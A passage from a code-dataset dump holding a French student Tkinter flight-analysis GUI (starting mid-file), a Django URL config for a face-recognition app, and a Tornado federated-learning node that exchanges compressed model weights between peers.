'time': time.strftime(\"%H:%M:%S\")}\r\n print(i)\r\n for csv_email in df2['email']:\r\n if str(csv_email)== Entree1.get():\r\n email = df2[df2['email']== Entree1.get()].index\r\n df2 = df2.drop(email)\r\n else:\r\n df2 = df2\r\n df2 = df2.append(maj, ignore_index = True)\r\n df2.to_csv('user_login.csv', index = False)\r\n \r\n else:\r\n print('non')\r\n affichage_resultat2 = tk.Label(o1, text=\"Pas un utilisateur valide !\")\r\n affichage_resultat2.grid(column=1, row=5)\r\n affichage_resultat2.after(3000, affichage_resultat2.destroy) \r\n \r\n\r\ndef signup():\r\n a = 0\r\n i = 0\r\n df=pd.read_csv(\"user_info.csv\",delimiter=(\",\"))\r\n confirmation=0\r\n for csv_email in df['email'] :\r\n i+=1\r\n if str(csv_email) == Entree3.get() :\r\n numero = i-1\r\n password = df['password']\r\n #print(numero)\r\n if str(password[numero]) == Entree4.get():\r\n confirmation = 1\r\n if confirmation == 1:\r\n affichage_resultat1 = tk.Label(o1, text=\" E-mail déjà inscrit !\")\r\n affichage_resultat1.grid(column=1, row=9)\r\n affichage_resultat1.after(3000, affichage_resultat1.destroy)\r\n \r\n else:\r\n new_email= Entree3.get()\r\n new_password = Entree4.get()\r\n affichage_resultat2 = tk.Label(o1, text=\"Nouvel utilisateur enregistré !\")\r\n affichage_resultat2.grid(column=1, row=9)\r\n affichage_resultat2.after(3000, affichage_resultat2.destroy)\r\n df2 = {'number': i, 'email': new_email, 'password' : new_password}\r\n df = df.append(df2, ignore_index = True)\r\n df.to_csv('user_info.csv',index=False) \r\n print(i)\r\n\r\n \r\n#Création de la barre d'onglets\r\nOnglets = ttk.Notebook(programme)\r\nOnglets.place(relwidth=1, relheight=1)\r\n#Onglets.geometry(\"720x360\")\r\no1 = ttk.Frame(Onglets)\r\no1.pack()\r\no2 = ttk.Frame(Onglets)\r\no2.pack()\r\no3 = ttk.Frame(Onglets)\r\no3.pack()\r\nOnglets.add(o1, text=\"LOGIN\")\r\nOnglets.add(o2, text=\"PASSENGERS\")\r\nOnglets.add(o3, text=\"FLIGHT VISUALIZATION\")\r\n\r\n\r\n#Ajout des labels\r\nlabel1 = Label(o1, text='Welcome to Flight Analyses System',font=(\"courier\",20))\r\nlabel1.grid(row = 0, column= 1)\r\nlabel2 = Label(o1, text='Email:',font=(\"courier\",10),bg='blue')\r\nlabel2.grid(row = 1, column= 0)\r\nlabel3 = Label(o1, text='Password:',font=(\"courier\",10),bg='blue')\r\nlabel3.grid(row = 2, column= 0)\r\nlabel4 = Label(o1, text='Email:',font=(\"courier\",10),bg='yellow')\r\nlabel4.grid(row = 6, column= 0)\r\nlabel5 = Label(o1, text='Password:',font=(\"courier\",10),bg='yellow')\r\nlabel5.grid(row = 7, column= 0)\r\n#Ajout des entrées\r\nEntree1 = Entry(o1)\r\nEntree1.grid(row = 1, column= 1)\r\nEntree2 = Entry(o1)\r\nEntree2.grid(row = 2, column= 1)\r\nEntree3 = Entry(o1)\r\nEntree3.grid(row = 6, column= 1)\r\nEntree4 = Entry(o1)\r\nEntree4.grid(row = 7, column= 1)\r\n#Création des boutons\r\nbouton1 = Button(o1, text='LOGIN', font=(\"courier\",10),bg='blue', command=login)\r\nbouton1.grid(row = 4, column= 1)\r\nbouton2 = Button(o1, text='SIGNUP', font=(\"courier\",10),bg='yellow', command=signup)\r\nbouton2.grid(row = 8, column= 1)\r\n\r\n\r\n\r\n\r\n\r\n###---------------------------------------------------------------Partie2--------------------------------------------------------------------\r\n#Fonction\r\ndef liste():\r\n i=0\r\n df = pd.read_csv('passenger_info.csv', delimiter=(\",\"))\r\n confirmation = 0\r\n for airline in df['Airline']:\r\n i+=1\r\n if str(airline) == spinbox1.get():\r\n numero = i-1\r\n destination = df['Destination']\r\n prix = df['Price']\r\n #print(\"aero\")\r\n if str(destination[numero]) == 
spinbox2.get():\r\n #print('')\r\n if str(prix[numero]) == spinbox3.get():\r\n print('gg')\r\n confirmation = 1\r\n passengersid= df['PassengerID']\r\n a = str(passengersid[numero])\r\n nom = df['Lastname']\r\n b = str(nom[numero]) \r\n terminal = df['Terminal']\r\n c = str(terminal[numero])\r\n zone = df['Boarding Area']\r\n d = str(zone[numero])\r\n affichage = tableau.insert(parent='', index=0, text='', values=(a,b,c,d))\r\n \r\n \r\n \r\n \r\n\r\n#Label\r\ntitre = Label(o2,text='Passenger information',font=(\"courier\",15))\r\ntitre.grid(row = 3, column= 5)\r\nlabel = Label(o2, text=\" \", font=(\"arial italic\", 18) )\r\nlabel.grid(column=1, row=1)\r\n\r\n#Bouton\r\nliste = ttk.Button(o2, text=\"List passenger\", command=liste)\r\n\r\nliste.grid(row = 3, column= 1)\r\n\r\n \r\n#Tableau\r\ntableau = ttk.Treeview(o2, columns=('Passengerid', 'Lastname', 'Terminal','BoardingArea'))\r\ntableau.heading('Passengerid', text='Passengerid')\r\ntableau.heading('Lastname', text='Lastname')\r\ntableau.heading('Terminal', text='Terminal')\r\ntableau.heading('BoardingArea', text='Boarding Area')\r\ntableau['show'] = 'headings'\r\ntableau.grid(row = 4, column= 5)\r\n\r\n#Menu deroulant\r\ndf = pd.read_csv('passenger_info.csv', delimiter=(\",\"))\r\n\r\ncompany = list(set(df['Airline']))\r\ndestination = list(set(df['Destination']))\r\nprice= list(set(df['Price']))\r\n\r\n\r\nspinbox1 = ttk.Spinbox(o2, values=company)\r\nspinbox1.grid(column=1, row=2)\r\n\r\nspinbox2 = ttk.Spinbox(o2, values=destination )\r\nspinbox2.grid(column=2, row=2)\r\n\r\nspinbox3 = ttk.Spinbox(o2, values=price )\r\nspinbox3.grid(column=3, row=2)\r\n\r\n\r\n###-------------------------------------------Partie3-----------------------------------------------------------\r\n##__________________________________________Affichage1__________________________________________________________\r\n\r\n#Lecture fichier\r\ndd = pd.read_csv('flight_info.csv', delimiter=',')\r\n\r\n#Création tableau \r\ntv = ttk.Treeview(o3)\r\ntv['columns']=('Year','Month','DayofMonth','DayOfWeek','FlightDate','FlightNum','OriginAirportID','OriginCityName','OriginState','OriginStateName','DestAirportID','DestCityName','DestState','DestStateName','DepTime','DepDelayMinutes','ArrTime','ArrDelayMinutes','AirTime','Distance')\r\n#Entete\r\ntv.heading('#0', text='', anchor=CENTER)\r\ntv.heading('Year', text='Year', anchor=CENTER)\r\ntv.heading('Month', text='Month', anchor=CENTER)\r\ntv.heading('DayofMonth', text='DayofMonth', anchor=CENTER)\r\ntv.heading('DayOfWeek', text='DayOfWeek', anchor=CENTER)\r\ntv.heading('FlightDate', text='FlightDate', anchor=CENTER)\r\ntv.heading('FlightNum', text='FlightNum', anchor=CENTER)\r\ntv.heading('OriginAirportID', text='OriginAirportID', anchor=CENTER)\r\ntv.heading('OriginCityName', text='OriginCityName', anchor=CENTER)\r\ntv.heading('OriginState', text='OriginState', anchor=CENTER)\r\ntv.heading('OriginStateName', text='OriginStateName', anchor=CENTER)\r\ntv.heading('DestAirportID', text='DestAirportID', anchor=CENTER)\r\ntv.heading('DestCityName', text='DestCityName', anchor=CENTER)\r\ntv.heading('DestState', text='DestState', anchor=CENTER)\r\ntv.heading('DestStateName', text='DestStateName', anchor=CENTER)\r\ntv.heading('DepTime', text='DepTime', anchor=CENTER)\r\ntv.heading('DepDelayMinutes', text='DepDelayMinutes', anchor=CENTER)\r\ntv.heading('ArrTime', text='ArrTime', anchor=CENTER)\r\ntv.heading('ArrDelayMinutes', text='ArrDelayMinutes', anchor=CENTER)\r\ntv.heading('AirTime', text='AirTime', 
anchor=CENTER)\r\ntv.heading('Distance', text='Distance', anchor=CENTER)\r\n#Colonnes\r\ntv.column('#0', width=0, stretch=NO)\r\ntv.column('Year', anchor=CENTER, width=40)\r\ntv.column('Month', anchor=CENTER, width=55)\r\ntv.column('DayofMonth', anchor=CENTER, width=80)\r\ntv.column('DayOfWeek', anchor=CENTER, width=80)\r\ntv.column('FlightDate', anchor=CENTER, width=80)\r\ntv.column('FlightNum', anchor=CENTER, width=80)\r\ntv.column('OriginAirportID',anchor=CENTER, width=80 )\r\ntv.column('OriginCityName', anchor=CENTER, width=80)\r\ntv.column('OriginState', anchor=CENTER, width=80)\r\ntv.column('OriginStateName', anchor=CENTER, width=80)\r\ntv.column('DestAirportID',anchor=CENTER, width=80)\r\ntv.column('DestCityName', anchor=CENTER, width=80)\r\ntv.column('DestState', anchor=CENTER, width=80)\r\ntv.column('DestStateName', anchor=CENTER, width=80)\r\ntv.column('DepTime',anchor=CENTER, width=80)\r\ntv.column('DepDelayMinutes',anchor=CENTER, width=80)\r\ntv.column('ArrTime', anchor=CENTER, width=80)\r\ntv.column('ArrDelayMinutes', anchor=CENTER, width=80)\r\ntv.column('AirTime', anchor=CENTER, width=80)\r\ntv.column('Distance', anchor=CENTER, width=80)\r\n#Lignes\r\ndd1 = dd['Year']\r\ndd2 = dd['Month']\r\ndd3 = dd['DayofMonth']\r\ndd4 = dd['DayOfWeek']\r\ndd5 = dd['FlightDate']\r\ndd6 = dd['OriginAirportID']\r\ndd7 = dd['OriginCityName']\r\ndd8 = dd['OriginState']\r\ndd9 = dd['OriginStateName']\r\ndd10 = dd['DestAirportID']\r\ndd11 = dd['DestCityName']\r\ndd12 = dd['DestState']\r\ndd13 = dd['DestStateName']\r\ndd14 = dd['DepTime']\r\ndd15 = dd['DepDelayMinutes']\r\ndd16 = dd['ArrTime']\r\ndd17 = dd['ArrDelayMinutes']\r\ndd18 = dd['AirTime']\r\ndd19 = dd['Distance']\r\n#Condition\r\nlen(dd1)\r\na = 0\r\nwhile a < len(dd1):\r\n tv.insert(parent='', index=a, iid=a, text='', values=(dd1[a],dd2[a],dd3[a],dd4[a],dd5[a],dd6[a],dd7[a],dd8[a],dd9[a],dd10[a],dd11[a],dd12[a],dd13[a],dd14[a],dd15[a],dd16[a],dd17[a],dd18[a],dd19[a]))\r\n a += 1\r\ntv.place(relx=0,rely=0,relwidth=1, relheight=0.2)\r\n\r\n\r\n#Graphique1\r\n\r\ndata1= {\"Pays1\":[' Arizona',\r\n ' Texas',\r\n ' Florida',\r\n ' North California',\r\n ' California',\r\n ' Pensylvania',\r\n ' Washington',\r\n ' Nevada',\r\n ' Georgia',\r\n ' Virginia',\r\n ' Wisconsin',\r\n ' Ohio',\r\n ' Illinois',\r\n ' Missouri',\r\n ' Nebraska',\r\n ' Indiana',\r\n ' Utha',\r\n ' Massachusettes',\r\n ' Hawaii',\r\n ' New York',\r\n ' Iowa',\r\n ' Minnesota',\r\n ' Colorado',\r\n ' Oregon',\r\n 'Maryland'],\r\n\"DestStateName\":[1066,466,286,226,160,120,88,72,72,64,60,56,56,52,32,24,20,16,16,12,8,8,2.4,1.6,0.8]}\r\ndf1 = DataFrame(data1, columns=[\"Pays1\",\"DestStateName\"])\r\nfigure1 = plt.Figure(figsize=(4,4), dpi=80)\r\nax1 = figure1.add_subplot(111)\r\nbar1 = FigureCanvasTkAgg(figure1, o3)\r\nbar1.get_tk_widget().place(relx=0,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf1 = df1[[\"Pays1\",\"DestStateName\"]].groupby(\"Pays1\").sum()\r\ndf1.plot(kind='bar', legend=True, ax=ax1)\r\nax1.set_title('Le nombre de vols vers différentes destinations')\r\n\r\n#Graphique2\r\ndata2= {\"Pays2\":[' Arizona',\r\n ' California',\r\n ' Colorado',\r\n ' Florida',\r\n ' Georgia',\r\n ' Hawaii',\r\n ' Illinois',\r\n ' Indiana',\r\n ' Iowa',\r\n ' Maryland',\r\n ' Massachusetts',\r\n ' Minesota',\r\n ' Missouri',\r\n ' Nebraska',\r\n ' Nevada',\r\n ' New York',\r\n ' North Californa',\r\n ' Ohio',\r\n ' Oregon',\r\n ' Pensylvania',\r\n ' Texas',\r\n ' Utha',\r\n ' Virginia',\r\n ' Washington',\r\n 
'Wisconsin'],\r\n\"DepDelayMinutes\":[10825,2018,183,1697,825,275,871,321,91,45,27,137,229,183,642,183,1284,871,0,1284,4495,458,733,917,183]}\r\ndf2 = DataFrame(data2, columns=[\"Pays2\",\"DepDelayMinutes\"])\r\nfigure2 = plt.Figure(figsize=(4,4), dpi=80)\r\nax2 = figure2.add_subplot(111)\r\nbar2 = FigureCanvasTkAgg(figure2, o3)\r\nbar2.get_tk_widget().place(relx=0.25,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf2 = df2[[\"Pays2\",\"DepDelayMinutes\"]].groupby(\"Pays2\").sum()\r\ndf2.plot(kind='bar', legend=True, ax=ax2,color='r')\r\nax2.set_title('Comparaison des délais avec la destination 1')\r\nrects2 = ax2.patches\r\npourcentage2=['38.57%','7.31%','0.31%','6.17%','2.73%','0.86%','2.76%','1.02%','0.13%','0.08%','0.07%','0.23%','0.78%','0.64%','2.24%','0.62%','4.41%','2.83%','0.0%','4.58%','15.93%','1.45%','2.51%','3.19%','0.59%']\r\nfor x2, y2 in zip(rects2, pourcentage2):\r\n height = x2.get_height()\r\n ax2.text(x2.get_x() + x2.get_width() / 2, height + 5, y2 ,ha='center', va='bottom',fontsize=7, color='blue', fontweight='bold')\r\n\r\n\r\n#Graphique3\r\ndata3= {\"Pays3\":[' Arizona',\r\n ' California',\r\n ' Colorado',\r\n ' Florida',\r\n ' Georgia',\r\n ' Hawaii',\r\n ' Illinois',\r\n ' Indiana',\r\n ' Iowa',\r\n ' Maryland',\r\n ' Massachusetts',\r\n ' Minesota',\r\n ' Missouri',\r\n ' Nebraska',\r\n ' Nevada',\r\n ' New York',\r\n ' North Californa',\r\n ' Ohio',\r\n ' Oregon',\r\n ' Pensylvania',\r\n ' Texas',\r\n ' Utha',\r\n ' Virginia',\r\n ' Washington',\r\n 'Wisconsin'],\r\n\"ArrDelayMinutes\":[12000,3052,105,2000,842,421,631,210,52,31,0,105,421,105,1578,210,2000,1157,0,2000,6842,947,1052,1263,210]}\r\ndf3 = DataFrame(data3, columns=[\"Pays3\",\"ArrDelayMinutes\"])\r\nfigure3 = plt.Figure(figsize=(4,4), dpi=80)\r\nax3 = figure3.add_subplot(111)\r\nbar3 = FigureCanvasTkAgg(figure3, o3)\r\nbar3.get_tk_widget().place(relx=0.5,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf3 = df3[[\"Pays3\",\"ArrDelayMinutes\"]].groupby(\"Pays3\").sum()\r\ndf3.plot(kind='bar', legend=True, ax=ax3,color='r')\r\nax3.set_title('Comparaison des délais avec la destination 2')\r\nrects3 = ax3.patches\r\npourcentage3=['39.3%','10.01%','0.26%','6.66%','2.84%','1.49%','2.1%','0.8%','0.09%','0.09%','0.01%','0.23%','0.75%','0.29%','3.14%','0.4%','3.95%','2.31%','0%','3.92%','14.25%','1.78%','2.12%','2.69%','0.51%']\r\nfor x3, y3 in zip(rects3, pourcentage3):\r\n height = x3.get_height()\r\n ax3.text(x3.get_x() + x3.get_width() / 2, height + 5, y3,ha='center', va='bottom',fontsize=7, color='blue', fontweight='bold')\r\n\r\n#Graphique4\r\ndata4= {\"Pays4\":[' Hawaii',\r\n ' Arizona',\r\n ' California',\r\n ' North California',\r\n ' Nevada',\r\n ' Ohio',\r\n ' Virginia',\r\n ' Florida',\r\n ' Minnesota',\r\n ' Indiana',\r\n ' Texas',\r\n ' Wisconsin',\r\n ' Illinois',\r\n ' Nebraska',\r\n 'Pensylvania'],\r\n\"Distance\":[2818,2818,2272,2272,2159,1977,1954,1943,1500,1477,1454,1454,1431,1318,1295]}\r\ndf4 = DataFrame(data4, columns=[\"Pays4\",\"Distance\"])\r\nfigure4 = plt.Figure(figsize=(4,4), dpi=80)\r\nax4 = figure4.add_subplot(111)\r\nbar4 = FigureCanvasTkAgg(figure4, o3)\r\nbar4.get_tk_widget().place(relx=0.75,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf4 = df4[[\"Pays4\",\"Distance\"]].groupby(\"Pays4\").sum()\r\ndf4.plot(kind='bar', legend=True, ax=ax4)\r\nax4.set_title('Top 15 des 
vols')\r\n\r\n\r\nprogramme.mainloop()\r\n","sub_path":"Grand_projet_Tkinter_S2/GP-code-final.py","file_name":"GP-code-final.py","file_ext":"py","file_size_in_byte":17493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"128505242","text":"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom faceRecog import views as app_views\nfrom django.contrib.auth import views\n\nurlpatterns = [\n url(r'^user/(?P\\w+)/$', app_views.index, name='indexmain'),\n url(r'^admindashboard$', app_views.admindashboard),\n url(r'^empdashboard$', app_views.empdashboard),\n url(r'^error_image$', app_views.errorImg),\n url(r'^trainer$', app_views.trainer),\n url(r'^detect/(?P\\w+)/$', app_views.detect, name='detect'),\n url(r'^predictaudio$', app_views.predictaudio),\n url(r'^capture$', app_views.capture),\n url(r'^admin/', admin.site.urls),\n url(r'^records/', include('records.urls')),\n]\n","sub_path":"Biometric-Authentication-P3/faceRecog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561888991","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\nimport asyncio\nimport base64\nimport gzip\nimport json\nimport logging\nimport os\nimport socket\nimport sys\nimport time\nimport subprocess\nimport copy\nimport numpy as np\nimport threading\nimport torch\nfrom tornado import httpclient, ioloop, web, httpserver\n\nfrom utils.options import args_parser\nfrom models.Update import LocalUpdate\nfrom models.Fed import FedAvg\nfrom models.test import test_img_total\nfrom utils.util import dataset_loader, model_loader, ColoredLogger\n\nlogging.setLoggerClass(ColoredLogger)\nlogger = logging.getLogger(\"main_fed\")\n\ntorch.manual_seed(0)\nnp.random.seed(0)\n\n# TO BE CHANGED\n# wait in seconds for other nodes to start\nstart_wait_time = 15\n# federated learning server listen port\nfed_listen_port = 8888\n# TO BE CHANGED FINISHED\n\n# NOT TO TOUCH VARIABLES BELOW\ntrigger_url = \"\"\npeer_address_list = []\ng_user_id = 0\nlock = threading.Lock()\nwMap = []\nipMap = {}\nnet_glob = None\nargs = None\ndataset_train = None\ndataset_test = None\ndict_users = []\ntest_users = []\nskew_users = []\ng_start_time = {}\ng_train_time = {}\n\n\n# returns variable from sourcing a file\ndef env_from_sourcing(file_to_source_path, variable_name):\n source = 'source %s && export MYVAR=$(echo \"${%s[@]}\")' % (file_to_source_path, variable_name)\n dump = '/usr/bin/python3 -c \"import os, json; print(os.getenv(\\'MYVAR\\'))\"'\n pipe = subprocess.Popen(['/bin/bash', '-c', '%s && %s' % (source, dump)], stdout=subprocess.PIPE)\n return pipe.stdout.read().decode(\"utf-8\").rstrip()\n\n\n# init: loads the dataset and global model\ndef init():\n global net_glob\n global dataset_train\n global dataset_test\n global dict_users\n global test_users\n global skew_users\n\n dataset_train, dataset_test, dict_users, test_users, skew_users = dataset_loader(args.dataset, args.iid,\n args.num_users)\n if dict_users is None:\n logger.error('Error: unrecognized dataset')\n sys.exit()\n\n img_size = dataset_train[0][0].shape\n net_glob = model_loader(args.model, args.dataset, args.device, args.num_channels, args.num_classes, img_size)\n if net_glob is None:\n logger.error('Error: unrecognized model')\n sys.exit()\n\n\nasync def train(user_id, w_glob, start_time, epochs):\n if user_id is None:\n user_id = await 
fetch_user_id()\n\n if epochs is None:\n epochs = args.epochs\n else:\n # load w_glob as net_glob\n net_glob.load_state_dict(w_glob)\n net_glob.eval()\n\n logger.info(\"#################### Epoch #\" + str(epochs) + \" start now ####################\")\n\n # training\n train_start_time = time.time()\n local = LocalUpdate(args=args, dataset=dataset_train, idxs=dict_users[user_id - 1])\n w, loss = local.train(net=copy.deepcopy(net_glob).to(args.device))\n train_time = time.time() - train_start_time\n from_ip = get_ip()\n await upload_local_w(user_id, epochs, w, from_ip, start_time, train_time)\n\n\nasync def gathered_global_w(user_id, epochs, w_glob, start_time, train_time):\n w_glob = conver_numpy_value_to_tensor(decompress_data(w_glob))\n net_glob.load_state_dict(w_glob)\n net_glob.eval()\n\n test_start_time = time.time()\n idx = int(user_id) - 1\n idx_total = [test_users[idx], skew_users[0][idx], skew_users[1][idx], skew_users[2][idx], skew_users[3][idx]]\n correct = test_img_total(net_glob, dataset_test, idx_total, args)\n acc_local = torch.div(100.0 * correct[0], len(test_users[idx]))\n # skew 5%\n acc_local_skew1 = torch.div(100.0 * (correct[0] + correct[1]), (len(test_users[idx]) + len(skew_users[0][idx])))\n # skew 10%\n acc_local_skew2 = torch.div(100.0 * (correct[0] + correct[2]), (len(test_users[idx]) + len(skew_users[1][idx])))\n # skew 15%\n acc_local_skew3 = torch.div(100.0 * (correct[0] + correct[3]), (len(test_users[idx]) + len(skew_users[2][idx])))\n # skew 20%\n acc_local_skew4 = torch.div(100.0 * (correct[0] + correct[4]), (len(test_users[idx]) + len(skew_users[3][idx])))\n\n test_time = time.time() - test_start_time\n\n # before start next round, record the time\n filename = \"result-record_\" + str(user_id) + \".txt\"\n # first time clean the file\n if epochs == args.epochs:\n with open(filename, 'w') as f:\n pass\n\n with open(filename, \"a\") as time_record_file:\n current_time = time.strftime(\"%H:%M:%S\", time.localtime())\n total_time = time.time() - start_time\n communication_time = total_time - train_time - test_time\n time_record_file.write(current_time + \"[\" + f\"{epochs:0>2}\" + \"]\"\n + \" \" + str(total_time)[:8]\n + \" \" + str(train_time)[:8]\n + \" \" + str(test_time)[:8]\n + \" \" + str(communication_time)[:8]\n + \" \" + str(acc_local.item())[:8]\n + \" \" + str(acc_local_skew1.item())[:8]\n + \" \" + str(acc_local_skew2.item())[:8]\n + \" \" + str(acc_local_skew3.item())[:8]\n + \" \" + str(acc_local_skew4.item())[:8]\n + \"\\n\")\n\n # start next round of train\n new_epochs = epochs - 1\n if new_epochs > 0:\n # reset a new time for next round\n asyncio.ensure_future(train(user_id, w_glob, time.time(), new_epochs))\n else:\n logger.info(\"########## ALL DONE! 
##########\")\n\n\nclass MultiTrainThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n time.sleep(start_wait_time)\n logger.debug(\"start new thread\")\n loop = asyncio.new_event_loop()\n loop.run_until_complete(train(None, None, time.time(), None))\n logger.debug(\"end thread\")\n\n\ndef test(data):\n detail = {\"data\": data}\n return detail\n\n\nasync def load_user_id():\n lock.acquire()\n global g_user_id\n g_user_id += 1\n detail = {\"user_id\": g_user_id}\n lock.release()\n return detail\n\n\nasync def release_global_w(epochs):\n lock.acquire()\n global g_user_id\n global wMap\n g_user_id = 0\n lock.release()\n w_glob = FedAvg(wMap)\n wMap = [] # release wMap after aggregation\n w_glob_compressed = compress_data(convert_tensor_value_to_numpy(w_glob))\n for user_id in ipMap.keys():\n key = str(user_id) + \"-\" + str(epochs)\n start_time = g_start_time.get(key)\n train_time = g_train_time.get(key)\n data = {\n 'message': 'release_global_w',\n 'user_id': user_id,\n 'epochs': epochs,\n 'w_glob': w_glob_compressed,\n 'start_time': start_time,\n 'train_time': train_time,\n }\n json_body = json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False, cls=NumpyEncoder).encode('utf8')\n my_url = \"http://\" + ipMap[user_id] + \":\" + str(fed_listen_port) + \"/trigger\"\n await http_client_post(my_url, json_body, 'release_global_w')\n\n\nasync def average_local_w(user_id, epochs, w, from_ip, start_time, train_time):\n lock.acquire()\n global wMap\n global ipMap\n\n global g_start_time\n global g_train_time\n key = str(user_id) + \"-\" + str(epochs)\n g_start_time[key] = start_time\n g_train_time[key] = train_time\n\n ipMap[user_id] = from_ip\n w = conver_numpy_value_to_tensor(decompress_data(w))\n wMap.append(w)\n lock.release()\n if len(wMap) == args.num_users:\n logger.debug(\"Gathered enough w, average and release them\")\n asyncio.ensure_future(release_global_w(epochs))\n\n\nasync def http_client_post(url, json_body, message=\"None\"):\n logger.debug(\"Start http client post [\" + message + \"] to: \" + url)\n method = \"POST\"\n headers = {'Content-Type': 'application/json; charset=UTF-8'}\n http_client = httpclient.AsyncHTTPClient()\n try:\n request = httpclient.HTTPRequest(url=url, method=method, headers=headers, body=json_body, connect_timeout=300,\n request_timeout=300)\n response = await http_client.fetch(request)\n logger.debug(\"[HTTP Success] [\" + message + \"] SERVICE RESPONSE: %s\" % response.body)\n return response.body\n except Exception as e:\n logger.error(\"[HTTP Error] [\" + message + \"] SERVICE RESPONSE: %s\" % e)\n return None\n\n\nasync def fetch_user_id():\n fetch_data = {\n 'message': 'fetch_user_id',\n }\n json_body = json.dumps(fetch_data, sort_keys=True, indent=4, ensure_ascii=False).encode('utf8')\n response = await http_client_post(trigger_url, json_body, 'fetch_user_id')\n responseObj = json.loads(response)\n detail = responseObj.get(\"detail\")\n user_id = detail.get(\"user_id\")\n return user_id\n\n\nasync def upload_local_w(user_id, epochs, w, from_ip, start_time, train_time):\n convert_tensor_value_to_numpy(w)\n w_glob_compressed = compress_data(convert_tensor_value_to_numpy(w))\n upload_data = {\n 'message': 'upload_local_w',\n 'user_id': user_id,\n 'epochs': epochs,\n 'w': w_glob_compressed,\n 'from_ip': from_ip,\n 'start_time': start_time,\n 'train_time': train_time,\n }\n json_body = json.dumps(upload_data, sort_keys=True, indent=4, ensure_ascii=False, cls=NumpyEncoder).encode('utf8')\n await 
http_client_post(trigger_url, json_body, 'upload_local_w')\n return\n\n\ndef conver_numpy_value_to_tensor(numpy_data):\n tensor_data = copy.deepcopy(numpy_data)\n for key, value in tensor_data.items():\n tensor_data[key] = torch.from_numpy(np.array(value))\n return tensor_data\n\n\ndef convert_tensor_value_to_numpy(tensor_data):\n numpy_data = copy.deepcopy(tensor_data)\n for key, value in numpy_data.items():\n numpy_data[key] = value.cpu().numpy()\n return numpy_data\n\n\n# compress object to base64 string\ndef compress_data(data):\n encoded = json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False, cls=NumpyEncoder).encode(\n 'utf8')\n compressed_data = gzip.compress(encoded)\n b64_encoded = base64.b64encode(compressed_data)\n return b64_encoded.decode('ascii')\n\n\n# based64 decode to byte, and then decompress it\ndef decompress_data(data):\n base64_decoded = base64.b64decode(data)\n decompressed = gzip.decompress(base64_decoded)\n return json.loads(decompressed)\n\n\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef get_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n logger.debug(\"Detected IP address: \" + IP)\n except Exception:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\n\nclass MainHandler(web.RequestHandler):\n\n async def get(self):\n response = {\"status\": \"yes\", \"detail\": \"test\"}\n in_json = json.dumps(response, sort_keys=True, indent=4, ensure_ascii=False).encode('utf8')\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(in_json)\n\n async def post(self):\n data = json.loads(self.request.body)\n status = \"yes\"\n detail = {}\n self.set_header(\"Content-Type\", \"application/json\")\n\n message = data.get(\"message\")\n if message == \"test\":\n detail = test(data.get(\"weight\"))\n elif message == \"fetch_user_id\":\n detail = await load_user_id()\n elif message == \"upload_local_w\":\n await average_local_w(data.get(\"user_id\"), data.get(\"epochs\"), data.get(\"w\"), data.get(\"from_ip\"),\n data.get(\"start_time\"), data.get(\"train_time\"))\n elif message == \"release_global_w\":\n await gathered_global_w(data.get(\"user_id\"), data.get(\"epochs\"), data.get(\"w_glob\"),\n data.get(\"start_time\"), data.get(\"train_time\"))\n\n response = {\"status\": status, \"detail\": detail}\n in_json = json.dumps(response, sort_keys=True, indent=4, ensure_ascii=False).encode('utf8')\n self.write(in_json)\n\n\ndef main():\n global peer_address_list\n global trigger_url\n global args\n\n # parse args\n args = args_parser()\n args.device = torch.device('cuda:{}'.format(args.gpu) if torch.cuda.is_available() and args.gpu != -1 else 'cpu')\n logger.setLevel(args.log_level)\n\n # parse network.config and read the peer addresses\n real_path = os.path.dirname(os.path.realpath(__file__))\n peer_address_var = env_from_sourcing(os.path.join(real_path, \"../fabric-samples/network.config\"), \"PeerAddress\")\n peer_address_list = peer_address_var.split(' ')\n peer_addrs = [peer_addr.split(\":\")[0] for peer_addr in peer_address_list]\n peer_header_addr = peer_addrs[0]\n trigger_url = \"http://\" + peer_header_addr + \":\" + str(fed_listen_port) + \"/trigger\"\n\n # parse participant number\n args.num_users = len(peer_address_list)\n\n # init dataset and global model\n init()\n\n # multi-thread training here\n 
 # multi-thread training here\n my_ip = get_ip()\n threads = []\n for addr in peer_addrs:\n if addr == my_ip:\n thread_train = MultiTrainThread()\n threads.append(thread_train)\n\n # Start all threads\n for thread in threads:\n thread.start()\n\n app = web.Application([\n (r\"/trigger\", MainHandler),\n ])\n http_server = httpserver.HTTPServer(app, max_buffer_size=10485760000) # 10GB\n http_server.listen(fed_listen_port)\n logger.info(\"start serving at \" + str(fed_listen_port) + \"...\")\n ioloop.IOLoop.current().start()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"federated-learning/main_fed.py","file_name":"main_fed.py","file_ext":"py","file_size_in_byte":13942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
